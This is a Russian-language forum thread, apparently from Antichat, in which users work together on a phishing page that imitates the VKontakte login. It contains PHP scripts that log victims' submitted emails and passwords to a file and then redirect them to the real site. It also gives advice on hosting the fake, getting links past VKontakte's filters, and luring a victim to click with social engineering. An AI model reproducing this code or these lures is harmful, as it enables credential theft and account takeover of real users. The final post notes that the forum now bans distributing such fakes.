Решил сделать фейк со страницей http://vkontakte.ru/login.php?u=2 , для логирования нашел в инете код Code: <?php $f=fopen("log.txt","at"); flock($f,2); fputs($f, $_POST['email'].";".$_POST['pass']." \n"); header("Location: http://vkontakte.ru/blank.php?code=10"); flock($f,3); fclose($f); ?> В лог ничего, кроме разделителя, не писалось при таком раскладе, и я стал менять содержимое index.htm, что тоже не привело к успеху. PHP не знаю, к сожалению, поэтому прошу помощи. Также имеется старый рабочий фейк http://slil.ru/29504411 , возможно, какие-то идеи с него пригодяться.
PHP: <?php if(isset($_POST)) { $fh = fopen("log.txt", "a+"); fwrite($fh, "{$_POST[email]}:{$_POST[pass]}\n"); fclose($fh); } header("Location: http://vkontakte.ru/blank.php?code=10"); ?>
geforse, опробовал, но по прежнему записывает в лог только двоеточие. Может быть дело в переменных? Я насочинял даже такой бред, используя все переменные из index.htm Code: <?PHP $Login = $_POST[login]; $Pass = $_POST[passwd]; $L = $_POST[email]; $Pa = $_POST[pass]; $Log = $_POST[act]; $Pas = $_POST[success_url]; $Logi = $_POST[fail_url]; $Passs = $_POST[try_to_login]; $Loginn = $_POST[to]; $Passss = $_POST[vk]; $Passsss = $_POST[password]; $Text = $_POST[text]; $Expire = $_POST[expire]; $log = fopen("base.php","a+"); fwrite($log,"\n $Login:$Pass:$L:$Pa:$Log:$Pas:$Logi:$Passs:$Loginn:$Passss:$Passsss:$Text:$Expire \n"); fclose($log); echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru'></head></html>"; ?> но это не помогло - даже не представляю, в чем загвоздка
Готовый фейк с двумя страницами авторизации проверкой ввода данных на сервере "Вконтакте" защитой файла БД Особо не тестировал, но вроде должно работать. Скачать з.ы. SHiNiGaMi, полностью согласен, ошибся.
Спасибо, а можешь подсказать бесплатный хост с поддержкой курлов? Я нагуглил некоторые, но с их настройками случились проблемы
Может хостинг не поддерживает глобальные переменные? Нужно заключить переданные данные в обычные переменные!
Глобальные переменные, это если Register_globals = on, а глобальные массивы GET и POST ты попробуй отключи))
Есть еще маленькая неприятность - вконтакте блочит ссылки на бесплатные хостинги, а жертва сидит только там и по другому впарить ссыль не представляется возможным...это как-то можно исправить?
СИ(впарить, только не слишком навязчиво, типа "для быстрого перехода нажмите здесь") И вообще я думаю что не надо редиректить на blank.php?code=10, надо curl'ом сразу передать на index.php?act=login чтобы после записи в лог юзер попал на настоящий контакт
перезаливать никто не будет, а если перезальют - тему\сообщение удалят, поскольку с недавних пор был введен запрет на любое расспространение фейков на античате, пора привыкнуть https://forum.antichat.ru/thread248520.html
